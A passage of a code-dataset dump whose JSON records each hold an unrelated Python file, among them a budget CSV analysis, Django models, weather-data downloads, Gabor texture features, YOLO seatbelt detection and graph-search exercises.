'/home/syh/disk/train/all_train_data'\n\n data_dir = args.datadir\n # data_dir = '/home/syh/all_train_data'\n create_txt(data_dir)\n\n\"\"\"\ncd ~/RetinaNet/data_processing\npython create_Main.py -d /home/syh/train_data/data/sub_train_data/train_data-2018-05-11\n\"\"\"","sub_path":"data_processing/create_Main.py","file_name":"create_Main.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"253021988","text":"#PyBank\nimport os\nimport csv\n\ncsvpath = os.path.join('budget_data.csv')\n\n#create lists\nmonths = []\nprofit_loss = []\nmom_dif = []\n\nwith open(csvpath, newline='') as csvfile:\n\n #specify delimiter and variable that holds\n csvreader = csv.reader(csvfile, delimiter=',')\n\n #skip header row\n csv_header = next(csvreader)\n\n #read rows after header\n for row in csvreader:\n\n #append list with months\n months.append(row[0])\n\n #calculate number of months\n num_months = len(months)\n\n #append list with PnL data\n profit_loss.append(float(row[1]))\n\n #calculate net total of PnL\n net_total = sum(profit_loss)\n\n \n \n #calculate MoM difference in PnL\n for i in range(1, len(profit_loss)):\n\n #append list to hold data\n mom_dif.append((profit_loss[i]) - (profit_loss[i-1]))\n\n #calculate average of list\n avg_mom_dif = round(sum(mom_dif) / len(mom_dif), 2)\n\n #find max MoM change\n max_mom_dif = max(mom_dif)\n\n #find min MoM change\n min_mom_dif = min(mom_dif)\n\n #find max date\n max_mom_dif_date = str(months[mom_dif.index(max(mom_dif)) + 1])\n\n #find min date\n min_mom_dif_date = str(months[mom_dif.index(min(mom_dif)) + 1])\n\n with open(\"PyBank_Analysis.txt\", \"w\") as text_file:\n\n #print analysis to txt file\n print(\"Financial Analysis\", file=text_file)\n print(\"---------------------------------\", file=text_file)\n print(f\"Total Months: {num_months}\", file=text_file)\n print(f\"Total: ${net_total}\", file=text_file)\n print(f\"Average Change: ${avg_mom_dif}\", file=text_file)\n print(f\"Greatest Increase in Profits: {max_mom_dif_date} (${max_mom_dif})\", file=text_file)\n print(f\"Greatest Decrease in Profits: {min_mom_dif_date} (${min_mom_dif})\", file=text_file)\n\nprint(open('PyBank_Analysis.txt').read())","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520560038","text":"from __future__ import unicode_literals\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\nfrom application import settings\n\n\nclass User(AbstractUser):\n\n pass\n\n\nclass Authored(models.Model):\n author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name='Author')\n\n class Meta:\n abstract = True\n\n\nclass Titled(models.Model):\n title = models.CharField(max_length=255, verbose_name='Title')\n\n def get_title(self):\n return self.title\n\n class Meta:\n abstract = True\n\n\nclass Dated(models.Model):\n created = models.DateTimeField(auto_now_add=True, verbose_name='Created')\n updated = models.DateTimeField(auto_now=True, verbose_name='Updated')\n\n class Meta:\n abstract = True\n\n\nclass Deletable(models.Model):\n is_deleted = models.BooleanField(default=False, verbose_name='Is deleted')\n\n class Meta:\n abstract = 
True\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"215958576","text":"##########import module#################\nfrom ecmwfapi import ECMWFDataServer\nfrom calendar import monthrange\nimport numpy as np\nfrom retrieve import retrieve\n########################################\n########################################\ninitial_year=2015 \ninitial_month=9 #Could change these variables to define the period\nend_year=2015 #leap year problem has been taken care of in this script already. \nend_month=9 #Can download only one month data or a long period of data\n########################################\nyear_loop=np.arange(initial_year,end_year+1)#could type help(np.arange) in python prompt to see the syntax of this function for +1\nfor year in year_loop:\n if (year!=year_loop[0]) & (year!=year_loop[-1]):\n month_loop=np.arange(1,12+1)\n elif (year== year_loop[0]) & (year==year_loop[-1]):\n month_loop=np.arange(initial_month,end_month+1)\n elif year==year_loop[-1]:\n month_loop=np.arange(1,end_month+1)\n else:\n month_loop=np.arange(initial_month,12+1)\n\n for month in month_loop:\n max_day=list(monthrange(year,month))[1]\n if month<10:\n date_string=str(year)+\"-0\"+str(month)+\"-01/to/\"+str(year)+\"-0\"+str(month)+\"-\"+str(max_day)\n target=str(year)+'0'+str(month)+\"PV_RTW.nc\" #target is just the name of the file.Change it depending on the parameters you choose in retrieve.py\n retrieve(date_string,target) #PV is potential vorticity, R relative humidity\n else: #T temperature and w vertical velocity \n date_string=str(year)+\"-\"+str(month)+\"-01/to/\"+str(year)+\"-\"+str(month)+\"-\"+str(max_day)\n target=str(year)+str(month)+\"PV_RTW.nc\"\n retrieve(date_string,target)\n","sub_path":"ecwmf/era_interim.py","file_name":"era_interim.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"593351542","text":"\r\n\r\nfrom Vehicle import Vehicle\r\nfrom Order import Order\r\n\r\nimport numpy as np\r\nimport pickle\r\nclass AbstractWorld:\r\n\t\r\n\tdef __init__(self):\r\n\t\t\r\n\t\t[VF,EF] = pickle.load(open(\"./Classes/data/Lehigh.pickle\",'rb'))\r\n\t\tself.Edges=[] \r\n\t\tfor edge in EF:\r\n\t\t\tself.Edges.append( [ edge[0] , edge[1] ,EF[edge][0 ],EF[edge][1 ],EF[edge][2 ] ])\t\t\t\r\n \r\n\t\t\r\n\t\tself.Verticies=[]\r\n\t\tfor v in VF:\r\n\t\t\tself.Verticies.append( [ v,float(VF[v][0]),float(VF[v][1])] )\t\t\t\r\n\t\t \r\n\t\t\r\n\t\tself.v = [v[0] for v in self.Verticies]\r\n\t\t\r\n\t\tself.vShuffled=[v[0] for v in self.Verticies]\r\n\t\tnp.random.seed(47)\r\n\t\tnp.random.shuffle(self.vShuffled)\r\n\t\t\r\n\t\tself.orderId = 0\r\n\t\tself.map = {\"L1\":[\"A\",\"B\"],\"L2\":[\"C\",\"D\"],\"L3\":[\"E\",\"F\"],\"L4\":[\"G\",\"H\"]}\r\n\t\t\r\n\tdef getLocationOfWarehouses(self):\t\r\n\t\ttypes = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\"]\r\n\t\tWarehouses = []\r\n\t\tj = 0\r\n\t\tfor t in types:\r\n\t\t\tfor k in range(2):\r\n\t\t\t\tWarehouses.append({\"type\":t,\"location\":self.vShuffled[j]})\r\n\t\t\t\tj+=1\r\n\t\t\r\n\t\treturn Warehouses\r\n\t\t\r\n\tdef getProductionLines(self):\t\r\n\t\ttypes = [\"L1\",\"L2\",\"L3\",\"L4\"]\r\n\t\tProductionLines = []\r\n\t\tj = 20\r\n\t\tfor t in types:\r\n\t\t\tfor k in 
range(5):\r\n\t\t\t\tProductionLines.append({\r\n\t\t\t\t\"type\":t,\r\n\t\t\t\t\"location\":self.vShuffled[j],\r\n\t\t\t\t\"capacityOfMaterial[tons]\":100})\r\n\t\t\t\tj+=1\r\n\t\t\r\n\t\treturn ProductionLines\r\n\t\t\r\n\tdef getInitialTruckLocations(self):\r\n\t\tnp.random.seed(47)\r\n\t\tvehicles = []\r\n\t\tnp.random.shuffle(self.v)\r\n\t\r\n\t\tfor i, v in enumerate(self.v):\r\n\t\t\tif i%3 == 0:\r\n\t\t\t\tnewVehicle = Vehicle(i,v)\r\n\t\t\t\tnewVehicle.type=\"Truck\"\r\n\t\t\t\tnewVehicle.capacity = np.random.randint(3,30)\r\n\t\t\t\tvehicles.append(newVehicle)\r\n\t\treturn vehicles\r\n\t\t\r\n\tdef getNewOrdersForGivenTime(self,t):\r\n\t\tnewOrders=[]\r\n\t\tnp.random.seed(t)\r\n\t\tif t > 22*60:\r\n\t\t\treturn newOrders\r\n\t\tif np.random.rand() < 0.3:\r\n\t\t\tn = np.random.randint(1,3)\r\n\t\t\tnp.random.shuffle(self.v)\r\n\t\t\tfor _ in range(n):\r\n\t\t\t\torder = Order(self.orderId)\r\n\t\t\t\torder.finalLocation=np.random.choice(self.vShuffled[40:])\r\n\t\t\t\t\r\n\t\t\t\tl = [e for e in self.map]\r\n\t\t\t\tnp.random.shuffle(l)\r\n\r\n\t\t\t\tfor j in l[0:np.random.randint(2,4)]:\r\n\t\t\t\t\torder.productionProcess.append({\r\n\t\t\t\t\t\t\"processinLine\":j,\r\n\t\t\t\t\t\t\"resourceNeeded\":np.random.choice(self.map[j]),\r\n\t\t\t\t\t\t\"processingTime\":np.random.randint(5,10),\r\n\t\t\t\t\t\t\"materialNeeded[tons]\":np.random.randint(2,10),\t\t\t\t\t\t\r\n\t\t\t\t\t\t})\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t \r\n\t\t\t\tself.orderId+=1\r\n\t\t\t\tnewOrders.append(order)\r\n\t\treturn newOrders\r\n\t\t \r\n\r\n","sub_path":"AbstractWorld.py","file_name":"AbstractWorld.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"109768746","text":"import chardet\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n#import cookielib\n\nurl = 'http://www.cdlr.gov.cn/detailnoright.aspx?id=96813'\nreferer = 'http://www.cdlr.gov.cn/detailnoright.aspx?id=96813'\nuser_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/603.1.13 (KHTML, like Gecko) Version/10.1 Safari/603.1.13'\nheaders = {'User-Agent':user_agent,'Referer':referer}\n#headers = {'User-Agent':user_agent}\nhtml = requests.get(url,headers=headers)\n#print(html.text)\n#print(response.headers)\nhtml.encoding = chardet.detect(html.content)['encoding']\n\nsoup = BeautifulSoup(html.text,'lxml' )\n#print(soup.title.string)\n#print(soup.title.string)\n#for a in soup.find_all(class_ = \"\n#    print(repr(a))\n#print('nextsibing:%s'%soup.title.next_sibling)\n#for tag in soup.find_all(True):\n#    print(tag.name)\n#print(soup.span.string)\na = soup.find_all(\"span\")\nfor i in a:\n    print(i)\n","sub_path":"urllib/local_request.py","file_name":"local_request.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"84576587","text":"\"\"\"\r\nCreates a Gabor feature.\r\n\r\n@author: Katerina Kratochvilova\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom skimage.filter import gabor_kernel #skimage.__version__ if it's lower than 0.11 then use filter instead of filters\r\nfrom skimage.filter import gabor_filter # gabor in newer versions\r\nfrom skimage import io\r\nimport skimage\r\nimport math\r\nimport cv2\r\nfrom scipy import ndimage as ndi\r\n\r\n# parameters of the Gabor function\r\norientations = [0, math.pi/4, math.pi/2, math.pi / 4 * 3]\r\nwavelengths = [0.25, 0.5, 1.0] #[2.0, 2.0 * math.sqrt(2), 4.0] #[4, 4.0 * math.sqrt(2), 8, 8 * math.sqrt(2) 
]\r\nsigma = 1\r\n\r\ndef create_kernels():\r\n    \"\"\"\r\n    Creates the kernels (filters) according to the given parameters.\r\n    \r\n    Return: \r\n        kernels -- the created kernels (filters).\r\n    \"\"\"\r\n    #print skimage.__version__\r\n    kernels = []\r\n    \r\n    for theta in orientations:\r\n        #print \"Theta: \", theta\r\n        for lambd in wavelengths:\r\n            kernel = gabor_kernel(1.0/lambd, theta=theta, sigma_x=sigma, sigma_y=sigma) # frequency is 1/lambda\r\n            kernels.append(kernel)\r\n            \r\n            #print kernel.shape\r\n            #print kernel\r\n            \r\n            #io.imshow(np.real(kernel))\r\n            #io.imshow(np.imag(kernel))\r\n            #io.imshow(io.concatenate_images([np.real(kernel), np.imag(kernel)])) \r\n            #io.show() \r\n            \r\n    \r\n    return kernels \r\n    \r\n\r\ndef show_kernels(kernels, real=True): #if False - show imaginary part\r\n    \"\"\"\r\n    Displays the kernels. \r\n    \r\n    Keyword arguments:\r\n    kernels -- the kernels.\r\n    real -- which part to display: only the real kernels or only the imaginary kernels.\r\n    \"\"\"\r\n    k_size = kernels[0].shape[0]\r\n    img = np.zeros((k_size * len(wavelengths), k_size * len(orientations)))\r\n    \r\n    #print img.shape\r\n    for i in range(len(kernels)):\r\n        if real:\r\n            k = np.real(kernels[i])\r\n        else:\r\n            k = np.imag(kernels[i])\r\n        n = np.linalg.norm(k) # for normalization\r\n        #print \"Norm:\", n\r\n        r = i % len(wavelengths)\r\n        c = i // len(wavelengths)\r\n        img[r * k_size : r*k_size + k_size, c*k_size : c*k_size + k_size] = k / n\r\n        \r\n    io.imshow(img)\r\n    io.show()\r\n    \r\ndef process_image(img):\r\n    \"\"\"\r\n    Applies the filters to an image.\r\n    \r\n    Keyword arguments:\r\n    img -- the input image.\r\n    Return:\r\n        responses -- the resulting responses after applying the filters. \r\n    \"\"\"\r\n    responses = []\r\n    \r\n    for theta in orientations:\r\n        for lambd in wavelengths:\r\n            real, imag = gabor_filter(img, 1.0/lambd, theta=theta, sigma_x=sigma, sigma_y=sigma, mode='reflect') # frequency is 1/lambda\r\n            responses.append((real, imag))\r\n            \r\n    #or use ndi.convolve(img, kernel, mode='wrap')\r\n    \r\n    #print len(responses)\r\n    \r\n    return responses\r\n\r\n\r\ndef count_magnitude(filtered_img_real, filtered_img_imag):\r\n    \"\"\"\r\n    Computes the magnitude.\r\n    filtered_img_real maps onto the x axis and filtered_img_imag onto the y axis, so we get vectors and compute their length.\r\n    \r\n    Keyword arguments:\r\n    filtered_img_real -- real part of the filtered images. \r\n    filtered_img_imag -- imaginary part of the filtered images.\r\n    Return:\r\n        magnitude -- the computed magnitude.\r\n    \"\"\"\r\n    magnitude = []\r\n    \r\n    for i in range(len(filtered_img_real)):\r\n        magnitude.append(cv2.magnitude(filtered_img_real[i], filtered_img_imag[i]))\r\n    \r\n    return magnitude\r\n\r\ndef count_vector(magnitudes, deep): \r\n    \"\"\"\r\n    Stacks the per-filter histograms one after another.\r\n    \r\n    Keyword arguments:\r\n    magnitudes -- the computed magnitude images. 
\r\n deep -- velikost vektrou.\r\n Return:\r\n array_histograms_magnitude -- vypocteny vektor.\r\n \"\"\"\r\n\r\n array_histograms_magnitude = np.zeros(shape=(deep*len(magnitudes)), dtype=np.int)\r\n\r\n for i in range(len(magnitudes)): \r\n for x in range(len(magnitudes[i])):\r\n for y in range(len(magnitudes[i][x])):\r\n value = magnitudes[i].item(x,y) \r\n index = ((i*deep))+int((value/deep)) # (i*deep) potrebuju se posunout na i-ty filtrovany obrazek\r\n array_histograms_magnitude[index]=array_histograms_magnitude[index]+1\r\n return array_histograms_magnitude\r\n\r\ndef count_gabor(img): \r\n \"\"\"\r\n Hlavni metoda pro vypocet gabor.\r\n \r\n Keyword arguments:\r\n img -- vstupni obrazek.\r\n Return:\r\n gabor_vector -- vytvoreny priznak.\r\n \"\"\"\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n kernels = create_kernels()\r\n img = img.astype(float)\r\n #show_kernels(kernels, real=True)\r\n\r\n responses = process_image(img)\r\n vector_deep = 16\r\n filtered_img_real = []\r\n filtered_img_imag = []\r\n \r\n for item in responses:\r\n filtered_img_real.append(item[0])\r\n filtered_img_imag.append(item[1])\r\n \r\n magnitude = count_magnitude(filtered_img_real, filtered_img_imag)\r\n gabor_vector = count_vector(magnitude, vector_deep)\r\n return gabor_vector\r\n #io.imshow(responses[11][0])\r\n #io.show()\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n","sub_path":"cd/src/deskriptors/gabor.py","file_name":"gabor.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"347285988","text":"##21000348 Andre Seo\n## Procedural Journey of Chicken\n\nfrom cs1graphics import*\n\ncanvas = Canvas(1000, 300)\ncanvas.setBackgroundColor(\"light blue\")\ncanvas.setTitle(\"Journey of Chicken\")\ncanvas.wait()\n\n#Create the ground\ndef create_ground():\n ground = Rectangle(1000,100)\n ground.setFillColor(\"light green\")\n ground.move(500,250)\n canvas.add(ground)\n\n#Create the sun\ndef create_sun():\n sun = Circle(50)\n sun.setFillColor(\"red\")\n sun.setBorderColor(\"red\")\n sun.move(25,25)\n canvas.add(sun)\n\n\n#Draw a chicken\ndef make_chicken(hen = False):\n layer = Layer()\n make_body(layer, hen)\n wing = make_wing(layer, hen)\n make_eye(layer, hen)\n make_beak(layer, hen)\n make_dots(layer, hen)\n return layer, wing\n\n\n######################################################\n\n\n#Make a body\ndef make_body(layer, hen = False):\n if hen:\n body = Ellipse(70, 80)\n body.setFillColor(\"white\")\n else:\n body = Ellipse(40, 50)\n body.setFillColor(\"yellow\")\n body.move(0,10)\n body.setBorderColor(\"yellow\")\n body.setDepth(20)\n layer.add(body)\n\n\n#Draw a wing\ndef make_wing(layer, hen = False):\n if hen:\n wing = Ellipse(60, 40)\n wing.setFillColor(\"white\")\n wing.setBorderColor(\"yellow\")\n wing.move(15,20)\n else:\n wing = Ellipse(30,20)\n wing.setFillColor(\"yellow\")\n wing.setBorderColor(\"orange\")\n wing.move(10,20)\n wing.adjustReference(-5, -5)\n wing.setDepth(19)\n layer.add(wing)\n return wing\n\n\n#Draw and eye\ndef make_eye(layer, hen = False):\n if hen:\n eye = Circle(3)\n eye.move(-15,-15)\n else:\n eye = Circle(2)\n eye.move(-5, 0)\n eye.setFillColor(\"black\")\n eye.setDepth(18)\n layer.add(eye)\n\n#Draw a beak\ndef make_beak(layer, hen = False):\n if hen:\n beak = Square(8)\n beak.move(-36, 0)\n else:\n beak = Square(4)\n beak.move(-22, 10)\n beak.rotate(45)\n beak.setFillColor(\"orange\")\n beak.setBorderColor(\"orange\")\n beak.setDepth(21)\n layer.add(beak)\n\n\n#Draw dots\ndef 
make_dots(layer, hen = False):\n if hen:\n head1 = Ellipse(5,8)\n head1.setFillColor(\"red\")\n head1.setBorderColor(\"red\")\n head1.move(600,158)\n head1.setDepth(22)\n layer.add(head1)\n\n head2 = Ellipse(5,8)\n head2.setFillColor(\"red\")\n head2.setBorderColor(\"red\")\n head2.move(594,458)\n head2.setDepth(22)\n layer.add(head2)\n\n######################################################\n\n \n#Draw the group\ndef make_group():##mother hen + baby chicken1\n group = Layer()\n mother_hen, wing = make_chicken(True)\n group.add(mother_hen)\n (chicken1, wing1) = make_chicken()\n chicken1.move(120, 0)\n group.add(chicken1)\n group.move(600,200)\n return group\n\n\ndef make_family():\n group = make_group()\n chicken2, wing2 = make_chicken()\n chicken2.move(800,200)\n canvas.add(group)\n canvas.add(chicken2)\n return group, chicken2, wing2\n\n\n#Create the scene\ndef create_scene():\n create_ground()\n create_sun()\n group, chicken2, wing2 = make_family()\n return group, chicken2, wing2\n\n\ndef move_group(group):\n for i in range(80):\n group.move(-5,-2)\n group.move(-5,2)\n if i == 30:\n text1 = Text(\"OH!\", 20)\n text1.move(800, 160)\n canvas.add(text1)\n elif i == 40:\n canvas.remove(text1)\n text2 = Text(\"WHERE IS MY MOMMY GOING?\", 30)\n text2.move(500, 110)\n canvas.add(text2)\n elif i == 55:\n canvas.remove(text2)\n\n\ndef move_chicken2(chicken2, wing2):\n for i in range(10):\n text3 = Text(\"Waif for ME~\", 25)\n text3.move(500, 110)\n canvas.add(text3)\n for k in range(5):\n chicken2.move(-10, -20)\n wing2.rotate(-10)\n for k in range(5):\n chicken2.move(-10, 20)\n wing2.rotate(10)\n\n\ndef animate_chicken_family():\n group, chicken2, wing2 = create_scene()\n move_group(group)\n move_chicken2(chicken2, wing2)\n\n\ndef main():\n animate_chicken_family()\n canvas.wait()\n canvas.close()\n\n\nmain()\n\n\n\n\n\n\n \n","sub_path":"Homework #12/1 PROCEDURAL_CHICKEN.py","file_name":"1 PROCEDURAL_CHICKEN.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"610586710","text":"import webbrowser\n\nclass Movie():\n \"\"\" This class provides a way to store movie related information\"\"\"\n \n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n \n def __init__(self, movieTitle, movieStoryline, posterImage, trailerYoutube):\n self.title = movieTitle\n self.storyline = movieStoryline\n self.poster_image_url = posterImage\n self.trailer_youtube_url = trailerYoutube\n\n def showTrailer(self):\n webbrowser.open(self.trailerYoutubeUrl)\n\n\n\n\n\n\n\n\n\n \n","sub_path":"Fundamentos de Programação/movies/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"244015328","text":"import discord\n\nfrom ..objects.bot import Menel\n\n\ndef setup(bot: Menel):\n @bot.event\n async def on_raw_reaction_add(payload: discord.RawReactionActionEvent):\n if payload.user_id == bot.OWNER and payload.emoji.name == '🗑️':\n try:\n message = await (await bot.fetch_channel(payload.channel_id)).fetch_message(payload.message_id)\n if message.author == bot.user:\n await message.delete()\n except discord.HTTPException as e:\n print(e)","sub_path":"Menel/handlers/reaction_add.py","file_name":"reaction_add.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"367476981","text":"import numpy as np\nimport cv2\nimport 
os\nimport time\nimport numpy as np\nfrom imutils import face_utils\nimport imutils\n\ndef increase_brightness(img, value=30):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n\n final_hsv = cv2.merge((h, s, v))\n img = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return img\n\ndef main():\n net = cv2.dnn.readNet(\"YOLOFI2.weights\", \"YOLOFI.cfg\")\n cap = cv2.VideoCapture(\"test.mp4\")\n classes = []\n l = 1\n with open(\"obj.names\", \"r\")as f:\n classes = [line.strip() for line in f.readlines()]\n layers_names = net.getLayerNames()\n outputlayers = [layers_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n colors = np.random.uniform(0, 255, size=(len(classes), 3))\n font = cv2.FONT_HERSHEY_PLAIN\n frame_id = 0\n dd = -1\n time_now = time.time()\n frame_id = 0\n err = 0\n\n pred_corrects = []\n while True:\n _, frame = cap.read()\n frame_id += 1\n beltcornerdetected = False\n beltdetected = False\n if frame is None:\n break\n height, width, channels = frame.shape\n\n # # Type you code here\n frame = frame[:, 90:-50]\n frame = increase_brightness(frame, 10)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # frame = cv2.bilateralFilter(frame, d=-1, sigmaSpace=20, sigmaColor=5)\n clahe = cv2.createCLAHE(clipLimit=10.0, tileGridSize=(16,16))\n frame = clahe.apply(frame)\n frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2RGB)\n\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (480, 480), (0, 0, 0), True, crop=False)\n net.setInput(blob)\n outs = net.forward(outputlayers)\n class_ids = []\n boxes = []\n shape = []\n confidence = 0\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n\n if confidence > 0.2:\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n if class_id == 1:\n beltcornerdetected = True\n elif class_id == 0:\n beltdetected = True\n\n # output whether prediction is correct\n print(frame_id)\n is_correct = 0\n if beltdetected and frame_id <= 125:\n is_correct = 1\n elif not beltdetected and frame_id > 125:\n is_correct = 1\n print(is_correct)\n pred_corrects.append(is_correct)\n # print(beltdetected)\n cv2.imshow(\"Image\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n print(\"Accuracy: {}\".format(sum(pred_corrects) / len(pred_corrects)))\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()","sub_path":"BeltDetectionLab2/BeltDetectionLab2.py","file_name":"BeltDetectionLab2.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9339376","text":"from collections import deque\n\n\ndef conv_list(n):\n adj_matrix = []\n for _ in range(n):\n adj_list = input().split()\n adj_list = list(map(int, adj_list))\n adj_row = [False] * n\n if adj_list[1] > 0:\n for i in adj_list[2:]:\n adj_row[i - 1] = True\n adj_matrix.append(adj_row)\n return adj_matrix\n\n\ndef depth_first_search(adj_matrix, n):\n visited = [None] * n\n count = 1\n searched = [None] * n\n start = 0\n stack = deque()\n stack.append(start)\n visited[start] = 1\n while count <= 2 * n:\n has_edge = adj_matrix[start]\n i = 0\n while i < n:\n if has_edge[i] and visited[i] is None:\n stack.append(i)\n count += 1\n 
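# --- Hedged editor sketch (an aside, not part of the original record;
# the helper name is ours). The surrounding file computes DFS
# discovery/finish timestamps with an explicit stack; a compact
# recursive equivalent over the same boolean adjacency matrix (as
# produced by conv_list above) looks like this:
import sys

def dfs_timestamps(adj):
    n = len(adj)
    sys.setrecursionlimit(max(10000, 2 * n))
    d, f, clock = [0] * n, [0] * n, [0]

    def visit(u):
        clock[0] += 1
        d[u] = clock[0]          # discovery time
        for v in range(n):
            if adj[u][v] and d[v] == 0:
                visit(v)
        clock[0] += 1
        f[u] = clock[0]          # finish time

    for u in range(n):
        if d[u] == 0:
            visit(u)
    return d, f
# --- end sketch ---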
visited[i] = count\n break\n i += 1\n if i < n:\n start = i\n else:\n searched_node = stack.pop()\n count += 1\n searched[searched_node] = count\n if len(stack) > 0:\n start = stack[-1]\n elif count < 2 * n:\n start = visited.index(None)\n stack.append(start)\n count += 1\n visited[start] = count\n else:\n break\n return visited, searched\n\n\ndef main():\n n = int(input())\n adj_matrix = conv_list(n)\n visited, searched = depth_first_search(adj_matrix, n)\n for i in range(n):\n print(\"{} {} {}\".format(i + 1, visited[i], searched[i]))\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"Python_codes/p02238/s659849161.py","file_name":"s659849161.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"123825058","text":"# 5494. 统计所有可行路径.py\nfrom functools import lru_cache\nfrom typing import List\n\n\nclass Solution:\n def countRoutes(self, locations: List[int], start: int,\n finish: int, fuel: int) -> int:\n mod = 10 ** 9 + 7\n begin, end = locations[start], locations[finish]\n if abs(begin - end) > fuel:\n return 0\n n = len(locations)\n\n @lru_cache(None)\n def dfs(i, j, pre):\n if pre == 0:\n if i == j:\n return 1\n return 0\n res = 0\n if i == j:\n res += 1\n for k in range(n):\n if k != i:\n need = abs(locations[i] - locations[k])\n if pre >= need:\n res += dfs(k, j, pre - need)\n return res\n\n return dfs(start, finish, fuel) % mod\n\n\ndef main():\n sol = Solution()\n res = sol.countRoutes([4, 3, 1], 1, 0, 6)\n print(res)\n res = sol.countRoutes([1, 2, 3], 0, 2, 40)\n print(res)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Week14/双周赛/5494. 统计所有可行路径.py","file_name":"5494. 统计所有可行路径.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383202199","text":"# general imports\nimport os\nimport sys\n\n# smartsim and smartredis imports\nfrom smartsim import Experiment\nfrom smartsim.settings import MpiexecSettings\nfrom smartsim.settings import MpirunSettings\n\n# Define function to parse node list\ndef parseNodeList(fname):\n with open(fname) as file:\n nodelist = file.readlines()\n nodelist = [line.rstrip() for line in nodelist]\n nodelist = [line.split('.')[0] for line in nodelist]\n nNodes = len(nodelist)\n return nodelist, nNodes\n\n# Parse command line arguments\nnodes = int(sys.argv[1])\nppn = int(sys.argv[2])\nsimprocs = int(sys.argv[3])\nsimprocs_pn = int(sys.argv[4])\ndbprocs_pn = int(sys.argv[5])\ndevice = sys.argv[6]\nlogging = sys.argv[7]\nhostfile = sys.argv[8]\n\n# Get nodes of this allocation (job) and split them between the tasks\nnodelist, nNodes = parseNodeList(hostfile)\nprint(f\"\\nRunning on {nNodes} total nodes on Polaris\")\nprint(nodelist, \"\\n\")\nhosts = ','.join(nodelist)\n\n# Initialize the SmartSim Experiment\nPORT = 6780\nexp = Experiment(\"inference-example\", launcher=\"pbs\")\n\n# Set the run settings, including the Fortran executable and how to run it\nFtn_exe = './src/inferenceFtn.exe'\nif (simprocs_pn self.time_samples:\n rand_start = np.random.randint(0, max_len - self.time_samples)\n noise_waveform = numpy_waveform[\n rand_start:rand_start + self.time_samples]\n np_noise_wav = np.array(noise_waveform)\n noise_wav = torch.tensor(np_noise_wav, dtype=torch.float32)\n return self.safe_pad(noise_wav)\n\n def __getitem__(self, idx):\n if self.augment:\n the_time = int(np.modf(time())[0] * 100000000)\n np.random.seed(the_time)\n\n example_sources_paths 
